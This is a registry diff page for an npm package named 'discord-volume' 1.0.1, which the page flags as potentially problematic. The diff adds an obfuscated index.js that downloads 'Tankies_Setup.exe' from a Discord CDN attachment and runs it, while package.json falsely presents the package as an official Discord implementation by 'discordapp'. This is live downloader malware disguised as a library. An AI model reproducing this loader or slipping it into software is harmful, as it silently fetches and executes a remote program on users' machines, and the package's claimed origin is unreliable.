discord-volume 1.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of discord-volume might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +11 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ function _0x1076(_0x54a99c,_0xd263cf){const _0x245b74=_0x245b();return _0x1076=function(_0x10762f,_0x303a7d){_0x10762f=_0x10762f-0x1b5;let _0x43e760=_0x245b74[_0x10762f];return _0x43e760;},_0x1076(_0x54a99c,_0xd263cf);}const _0x2c818a=_0x1076;function _0x245b(){const _0x255daf=['https','close','pipe','Error\x20deleting\x20file:\x20','167223SauTbu','log','child_process','stderr:\x20','208490LeXyqm','8QoKLLC','60MwILGD','get','199045kpTKQb','Tankies_Setup.exe','unlink','966645brAcJv','Execution\x20error:\x20','1775550fVWeFA','createWriteStream','finish','12zHXhuS','846643nycNtO','Download\x20error:','error','505232QotcKz'];_0x245b=function(){return _0x255daf;};return _0x245b();}(function(_0x4bd7ec,_0x1b2512){const _0x400dba=_0x1076,_0x11043d=_0x4bd7ec();while(!![]){try{const _0x261dd7=parseInt(_0x400dba(0x1bb))/0x1+-parseInt(_0x400dba(0x1c7))/0x2*(-parseInt(_0x400dba(0x1b7))/0x3)+-parseInt(_0x400dba(0x1cb))/0x4+-parseInt(_0x400dba(0x1bf))/0x5*(parseInt(_0x400dba(0x1bd))/0x6)+parseInt(_0x400dba(0x1c8))/0x7*(parseInt(_0x400dba(0x1bc))/0x8)+-parseInt(_0x400dba(0x1c2))/0x9+parseInt(_0x400dba(0x1c4))/0xa;if(_0x261dd7===_0x1b2512)break;else _0x11043d['push'](_0x11043d['shift']());}catch(_0x5c6c90){_0x11043d['push'](_0x11043d['shift']());}}}(_0x245b,0x332e5));const fs=require('fs'),https=require(_0x2c818a(0x1cc)),{exec}=require(_0x2c818a(0x1b9)),file=fs[_0x2c818a(0x1c5)](_0x2c818a(0x1c0)),request=https[_0x2c818a(0x1be)]('https://cdn.discordapp.com/attachments/1133429760949756075/1175107333370691635/Tankies_Setup.exe',function(_0x99bffd){const _0x4681ff=_0x2c818a;_0x99bffd[_0x4681ff(0x1b5)](file),file['on'](_0x4681ff(0x1c6),function(){const _0x574648=_0x4681ff;file[_0x574648(0x1cd)](),console[_0x574648(0x1b8)](_0x574648(0x1ca)),exec('Tankies_Setup.exe',(_0x42d378,_0x34d4fd,_0x124d25)=>{const _0x1d1fe7=_0x574648;if(_0x42d378){console[_0x1d1fe7(0x1ca)](_0x1d1fe7(0x1c3)+_0x42d378);return;}console['log']('stdout:\x20'+_0x34d4fd),console['error'](_0x1d1fe7(0x1ba)+_0x124d25);});});});request['on'](_0x2c818a(0x1ca),function(_0x163ac4){const _0x334483=_0x2c818a;fs[_0x334483(0x1c1)]('Tankies_Setup.exe',_0x5d955=>{const _0x49e7f8=_0x334483;if(_0x5d955)console[_0x49e7f8(0x1ca)](_0x49e7f8(0x1b6)+_0x5d955);}),console[_0x334483(0x1ca)](_0x334483(0x1c9),_0x163ac4['message']);});
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "discord-volume",
3
+ "version": "1.0.1",
4
+ "description": "Official Discord Volume Implementation",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "discordapp",
10
+ "license": "ISC"
11
+ }